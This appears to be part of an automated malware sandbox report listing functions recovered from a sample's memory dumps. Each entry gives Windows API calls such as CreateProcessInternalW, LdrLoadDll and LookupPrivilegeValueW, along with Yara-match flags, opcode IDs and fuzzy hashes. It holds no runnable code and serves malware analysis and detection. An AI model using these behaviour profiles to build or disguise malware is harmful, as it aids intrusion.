                                                                                                                          • Opcode ID: 0e00697746aa5dd8337ee891a4fb8323be96efdeaa4a57bf2aa8b53f8968f913
                                                                                                                          • Instruction ID: b575b60aecee8331c95f33504e48e59040130b4ba7f593464d740f996af5b277
                                                                                                                          • Opcode Fuzzy Hash: 0e00697746aa5dd8337ee891a4fb8323be96efdeaa4a57bf2aa8b53f8968f913
                                                                                                                          • Instruction Fuzzy Hash: 009002B120100842F10465994405B47000997E0345F51C116A0115658DA695D8517561
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 045F96E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.594480948.0000000004590000.00000040.00000001.sdmp, Offset: 04590000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.594770100.00000000046AB000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 00000004.00000002.594779943.00000000046AF000.00000040.00000001.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: 01e4bf5ed921d862b296ee8bcda3e4a419f007ba0d8c95c8807631c8c216b3bd
                                                                                                                          • Instruction ID: e933bc292dee1d50d96bedf79c9f3f304084893d21598fefb28c4cf39d2d6d88
                                                                                                                          • Opcode Fuzzy Hash: 01e4bf5ed921d862b296ee8bcda3e4a419f007ba0d8c95c8807631c8c216b3bd
                                                                                                                          • Instruction Fuzzy Hash: 279002B120108802F1146599840574B000997D0345F55C511A441565CDA6D5D8917161
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 045F9710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.594480948.0000000004590000.00000040.00000001.sdmp, Offset: 04590000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.594770100.00000000046AB000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 00000004.00000002.594779943.00000000046AF000.00000040.00000001.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: 6d11490b7b8a66b3839cca2925821d2b46b715e198b36a32cf70c37302d4d7db
                                                                                                                          • Instruction ID: d9dd68f8a590f094a125d1cc68ac8ec3cc307070656c9ec2b9f3f8f813ae0c1c
                                                                                                                          • Opcode Fuzzy Hash: 6d11490b7b8a66b3839cca2925821d2b46b715e198b36a32cf70c37302d4d7db
                                                                                                                          • Instruction Fuzzy Hash: 169002B120100402F10469D95409647000997E0345F51D111A5015559EE6E5D8917171
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 045F9FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.594480948.0000000004590000.00000040.00000001.sdmp, Offset: 04590000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.594770100.00000000046AB000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 00000004.00000002.594779943.00000000046AF000.00000040.00000001.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: bf327317e0e11f299974cb1b071cac2b41c7359be6fc4458f93ef8885dbf8189
                                                                                                                          • Instruction ID: ba901e7d45a9de6ad1c8a145dd3b57560361f00dbf8a45a3eb638930a9808002
                                                                                                                          • Opcode Fuzzy Hash: bf327317e0e11f299974cb1b071cac2b41c7359be6fc4458f93ef8885dbf8189
                                                                                                                          • Instruction Fuzzy Hash: 0D9002B131114402F11465998405707000997D1245F51C511A081555CDA6D5D8917162
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 045F9780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.594480948.0000000004590000.00000040.00000001.sdmp, Offset: 04590000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.594770100.00000000046AB000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 00000004.00000002.594779943.00000000046AF000.00000040.00000001.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: 236b9340fc7334b2b24585d741dd4dc6c934926631f4e74162e955b46a11830c
                                                                                                                          • Instruction ID: b24e94685bd3d43c7be26e072db193fc4779569877ad87e2e22fb4dd7d833c70
                                                                                                                          • Opcode Fuzzy Hash: 236b9340fc7334b2b24585d741dd4dc6c934926631f4e74162e955b46a11830c
                                                                                                                          • Instruction Fuzzy Hash: A59002A921300002F1847599540960B000997D1246F91D515A000655CCE995D8696361
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 045F9840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.594480948.0000000004590000.00000040.00000001.sdmp, Offset: 04590000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.594770100.00000000046AB000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 00000004.00000002.594779943.00000000046AF000.00000040.00000001.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: f5d24cd05b4a37d259bd46023cc2ab4e4634cdc273e464403e443e75aa028971
                                                                                                                          • Instruction ID: 331812b7e4c449c909133e491923e22ec52f8b1dc12c0931a36168d3093d8538
                                                                                                                          • Opcode Fuzzy Hash: f5d24cd05b4a37d259bd46023cc2ab4e4634cdc273e464403e443e75aa028971
                                                                                                                          • Instruction Fuzzy Hash: D49002A1242041527549B5994405507400AA7E0285791C112A1405954CA5A6E856E661
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 045F9860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.594480948.0000000004590000.00000040.00000001.sdmp, Offset: 04590000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.594770100.00000000046AB000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 00000004.00000002.594779943.00000000046AF000.00000040.00000001.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: 3583d33c63cf5f48cfb3b5d563c56c4dd895f80994f63fcddbb69f26ee930cca
                                                                                                                          • Instruction ID: 1233a38d3074511b572b3891b0f7ba11d8f1f3c66cff05badaf0abc732d91669
                                                                                                                          • Opcode Fuzzy Hash: 3583d33c63cf5f48cfb3b5d563c56c4dd895f80994f63fcddbb69f26ee930cca
                                                                                                                          • Instruction Fuzzy Hash: 629002B120100413F11565994505707000D97D0285F91C512A041555CDB6D6D952B161
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 045F9910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.594480948.0000000004590000.00000040.00000001.sdmp, Offset: 04590000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.594770100.00000000046AB000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 00000004.00000002.594779943.00000000046AF000.00000040.00000001.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: 777b9f4639277a793688cf1e1ef10ade04aad3efcf221ecdc4f00e0b93994339
                                                                                                                          • Instruction ID: 4e9c7f223856c125d7d8700d8beb28e9b7911166c700114f51a5ce4eec4a8cfa
                                                                                                                          • Opcode Fuzzy Hash: 777b9f4639277a793688cf1e1ef10ade04aad3efcf221ecdc4f00e0b93994339
                                                                                                                          • Instruction Fuzzy Hash: 419002F120100402F14475994405747000997D0345F51C111A5055558EA6D9DDD576A5
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 045F99A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.594480948.0000000004590000.00000040.00000001.sdmp, Offset: 04590000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.594770100.00000000046AB000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 00000004.00000002.594779943.00000000046AF000.00000040.00000001.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: 8b063fcfa6338386b6c0d670a404d3974bfc9a227ab0d28084872198da6d71ed
                                                                                                                          • Instruction ID: 27a7fbd63ab48d39780ecdba5e810d577a8006d5436b54870cb331930b727ef4
                                                                                                                          • Opcode Fuzzy Hash: 8b063fcfa6338386b6c0d670a404d3974bfc9a227ab0d28084872198da6d71ed
                                                                                                                          • Instruction Fuzzy Hash: BE9002E134100442F10465994415B070009D7E1345F51C115E1055558DA699DC527166
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 045F9A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.594480948.0000000004590000.00000040.00000001.sdmp, Offset: 04590000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.594770100.00000000046AB000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 00000004.00000002.594779943.00000000046AF000.00000040.00000001.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: 65b826f0a314ba080b448d20993d30d4503d9211e6bcd543cef29d2f3ba3e108
                                                                                                                          • Instruction ID: 423e71b66e989be692958b99cc672da574d43ae50b42145301b16c30163e0256
                                                                                                                          • Opcode Fuzzy Hash: 65b826f0a314ba080b448d20993d30d4503d9211e6bcd543cef29d2f3ba3e108
                                                                                                                          • Instruction Fuzzy Hash: 5A9002A121180042F20469A94C15B07000997D0347F51C215A0145558CE995D8616561
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 02C16EF0, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • Sleep.KERNELBASE(000007D0), ref: 02C16F98
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.594004025.0000000002C00000.00000040.00000001.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Sleep
                                                                                                                          • String ID: net.dll$wininet.dll
                                                                                                                          • API String ID: 3472027048-1269752229
                                                                                                                          • Opcode ID: 03d41cf3a13b2fb4802584e5cc4aa97dff399ad698c1439f5adf2832003c1629
                                                                                                                          • Instruction ID: 0f76d70b63f17cd6a09370cf819aa539ecd39e00f19049a0126f82dda87f1680
                                                                                                                          • Opcode Fuzzy Hash: 03d41cf3a13b2fb4802584e5cc4aa97dff399ad698c1439f5adf2832003c1629
                                                                                                                          • Instruction Fuzzy Hash: E2319EB1601704ABC721DF68C8A1FA7B7F9BB89700F10841DF61AAB240D730B545DBE0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 02C16EE6, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 81sleepCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • Sleep.KERNELBASE(000007D0), ref: 02C16F98
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.594004025.0000000002C00000.00000040.00000001.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Sleep
                                                                                                                          • String ID: net.dll$wininet.dll
                                                                                                                          • API String ID: 3472027048-1269752229
                                                                                                                          • Opcode ID: 6b7617ac0ee6e22add5dfebb65a5511c282918e9772ae2f9ecbebc3b78e4506b
                                                                                                                          • Instruction ID: fe55f67bb491fce6d14d9733aaa12e92dd8466e698fe13f064df7c0bc13464e8
                                                                                                                          • Opcode Fuzzy Hash: 6b7617ac0ee6e22add5dfebb65a5511c282918e9772ae2f9ecbebc3b78e4506b
                                                                                                                          • Instruction Fuzzy Hash: C921DDB1601700ABC710DF64C8A2FAAB7B9BB89700F10802DF61AAB240D370A545DBE1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 02C184D4, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02C03B93), ref: 02C1850D
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.594004025.0000000002C00000.00000040.00000001.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: FreeHeap
                                                                                                                          • String ID: .z`
                                                                                                                          • API String ID: 3298025750-1441809116
                                                                                                                          • Opcode ID: e641709b8896f5aac4485ac3c5df57708f99eaa19733368f4537f06727c84e07
                                                                                                                          • Instruction ID: 77c89f13edaa74ab14a2dc7e04df7f6637856949ef2776c9805fd163d4222e2c
                                                                                                                          • Opcode Fuzzy Hash: e641709b8896f5aac4485ac3c5df57708f99eaa19733368f4537f06727c84e07
                                                                                                                          • Instruction Fuzzy Hash: ECE0D8AC2442851BEB04EE69E4908A73795FF853547149A49EC9987307C134D8168BB1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 02C184E0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02C03B93), ref: 02C1850D
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.594004025.0000000002C00000.00000040.00000001.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: FreeHeap
                                                                                                                          • String ID: .z`
                                                                                                                          • API String ID: 3298025750-1441809116
                                                                                                                          • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                                                                          • Instruction ID: 2136914bf264c527dbc8fb768a549e7ed68ed66facf597e71ea067a323fa62d2
                                                                                                                          • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                                                                          • Instruction Fuzzy Hash: 49E046B1200308ABDB18EF99CC49EA777ADEF88750F018658FE085B281C630F910CAF0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 02C07270, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 02C072CA
                                                                                                                          • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02C072EB
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.594004025.0000000002C00000.00000040.00000001.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: MessagePostThread
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1836367815-0
                                                                                                                          • Opcode ID: 49ab76c00c9184220b9dbad1f4bc5ba5386cd827cddda64d51339b7d16c96ff1
                                                                                                                          • Instruction ID: f211d6b65d6959c28d1914f695c5368dcc12a48c46d4c2f90ac2cd01ed7fa071
                                                                                                                          • Opcode Fuzzy Hash: 49ab76c00c9184220b9dbad1f4bc5ba5386cd827cddda64d51339b7d16c96ff1
                                                                                                                          • Instruction Fuzzy Hash: 9101A231A8022877E724A6948C42FFEB76C5F45F51F154118FF04BA1C1E6A47A069AF5
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 02C09B30, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 02C09BA2
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.594004025.0000000002C00000.00000040.00000001.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Load
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2234796835-0
                                                                                                                          • Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                                                                          • Instruction ID: bf889c724c88c56f5e4c644421ea6bfe8473aa9db6c74c9f1cd7930c4c629d84
                                                                                                                          • Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                                                                          • Instruction Fuzzy Hash: 2D011EB5E0020DABDB10DBA4DC82F9EB7799B44718F0041A5E91897281F671EB18DB91
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 02C18675, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,02C0CFB2,02C0CFB2,?,00000000,?,?), ref: 02C18670
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.594004025.0000000002C00000.00000040.00000001.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: LookupPrivilegeValue
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3899507212-0
                                                                                                                          • Opcode ID: b95dca177bc3e0b334d8870d58869377c2e54386ebba5061efa66b41deb5e64a
                                                                                                                          • Instruction ID: b2968c30c7333860f4e95434016b97b306dfe93e706ad508cf3479513a665f2c
                                                                                                                          • Opcode Fuzzy Hash: b95dca177bc3e0b334d8870d58869377c2e54386ebba5061efa66b41deb5e64a
                                                                                                                          • Instruction Fuzzy Hash: 2C01D6B22042446FDB24DF64CC89EEB7B68EF85350F144699FD8D57241C930E811CBE0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 02C1854E, Relevance: 1.5, APIs: 1, Instructions: 43processCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02C185A4
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.594004025.0000000002C00000.00000040.00000001.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateInternalProcess
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2186235152-0
                                                                                                                          • Opcode ID: 8967850bb2fc1f34c19b83c00b9e08fe12e6c6e2fedc569ce408f917b69c990d
                                                                                                                          • Instruction ID: 86faa859c21438caa941d5b796b017ff52375e64fc0e5931699ab0520a88fc12
                                                                                                                          • Opcode Fuzzy Hash: 8967850bb2fc1f34c19b83c00b9e08fe12e6c6e2fedc569ce408f917b69c990d
                                                                                                                          • Instruction Fuzzy Hash: 7A019DB2214208ABCB54DF89DC80EEB77ADAF8C754F158258FA0D97240C630E8518BA4
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 02C18550, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02C185A4
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.594004025.0000000002C00000.00000040.00000001.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateInternalProcess
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2186235152-0
                                                                                                                          • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                                                                          • Instruction ID: 83aaf0ec3ec1326f08a38c7cfce5db5989f960b041c26f7b2f8c4cd45ad15fe6
                                                                                                                          • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                                                                          • Instruction Fuzzy Hash: 2E01AFB2214208ABCB54DF89DC80EEB77ADAF8C754F158258BA0D97240C630E851CBA4
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 02C17020, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,02C0CCE0,?,?), ref: 02C1705C
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.594004025.0000000002C00000.00000040.00000001.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateThread
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2422867632-0
                                                                                                                          • Opcode ID: 4b74d86bfe42af7d5fcb5c346ac09a19e00ed37dcbf51293ece7a7ca142cbe85
                                                                                                                          • Instruction ID: b2f13443ab633fcaeb11682b440b1b7df74c0f3c2fd2578f3acff6925ccc6bee
                                                                                                                          • Opcode Fuzzy Hash: 4b74d86bfe42af7d5fcb5c346ac09a19e00ed37dcbf51293ece7a7ca142cbe85
                                                                                                                          • Instruction Fuzzy Hash: 0BE06D333803043AE3306599AC03FA7B29D8B86B24F140026FA0DEB2C0D595F80156A4
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 02C18640, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,02C0CFB2,02C0CFB2,?,00000000,?,?), ref: 02C18670
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.594004025.0000000002C00000.00000040.00000001.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: LookupPrivilegeValue
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3899507212-0
                                                                                                                          • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                                                          • Instruction ID: a84407be68a4e6a548b0fc7edf42d6a3dd39a20d95e8eb0eb32df7d123f61478
                                                                                                                          • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                                                          • Instruction Fuzzy Hash: 95E01AB12002086BDB10EF49CC85EE737ADAF89650F018154BA0857241C930E8108BF5
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 02C184A0, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • RtlAllocateHeap.NTDLL(02C13526,?,02C13C9F,02C13C9F,?,02C13526,?,?,?,?,?,00000000,00000000,?), ref: 02C184CD
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.594004025.0000000002C00000.00000040.00000001.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: AllocateHeap
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1279760036-0
                                                                                                                          • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                                                                          • Instruction ID: 04ce00352b5ae8d12910b9ff01ff57902cd954efc8c76a9ec24ca4119d151c25
                                                                                                                          • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                                                                          • Instruction Fuzzy Hash: B7E012B1200208ABDB14EF99CC41EA777ADAF88650F118658BA085B281C630F9108AB0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 02C18642, Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,02C0CFB2,02C0CFB2,?,00000000,?,?), ref: 02C18670
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.594004025.0000000002C00000.00000040.00000001.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: LookupPrivilegeValue
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3899507212-0
                                                                                                                          • Opcode ID: b86ce0f69160b41f642dc728448cc3b703696c3d4e65d99745e67c76f72a3c12
                                                                                                                          • Instruction ID: ad5771e4db27738ec0d4d0fed34ad8c0f2d21d82b2041537fa524d0c738f0610
                                                                                                                          • Opcode Fuzzy Hash: b86ce0f69160b41f642dc728448cc3b703696c3d4e65d99745e67c76f72a3c12
                                                                                                                          • Instruction Fuzzy Hash: 2BE04FB12002046FDB10DF54CC84EE73769EF89350F018254F90C97241C531E8118BB0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 02C0D420, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • SetErrorMode.KERNELBASE(00008003,?,?,02C07C73,?), ref: 02C0D44B
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.594004025.0000000002C00000.00000040.00000001.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorMode
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2340568224-0
                                                                                                                          • Opcode ID: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
                                                                                                                          • Instruction ID: a91eb16345202fa02161b066cebcd173f8be65aabe173322a3a8e3afd631c2ac
                                                                                                                          • Opcode Fuzzy Hash: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
                                                                                                                          • Instruction Fuzzy Hash: 00D0A7717503043BE710FAE49C03F2672CD9B85B04F494074F949D73C3DA54F5004561
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 045F967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.594480948.0000000004590000.00000040.00000001.sdmp, Offset: 04590000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.594770100.00000000046AB000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 00000004.00000002.594779943.00000000046AF000.00000040.00000001.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: d797f1d6059c1722f5c7fcfb0af443eba6b0f0ecd17a5437e4ba3861ad350411
                                                                                                                          • Instruction ID: b0c917e466a45a69a612b563632a8782c302532a7632d626a1d2f637cf824a51
                                                                                                                          • Opcode Fuzzy Hash: d797f1d6059c1722f5c7fcfb0af443eba6b0f0ecd17a5437e4ba3861ad350411
                                                                                                                          • Instruction Fuzzy Hash: B3B09BF19014C5C5F715DBA15A087177A047BD0745F16C151D2020645A5778D091F5B6
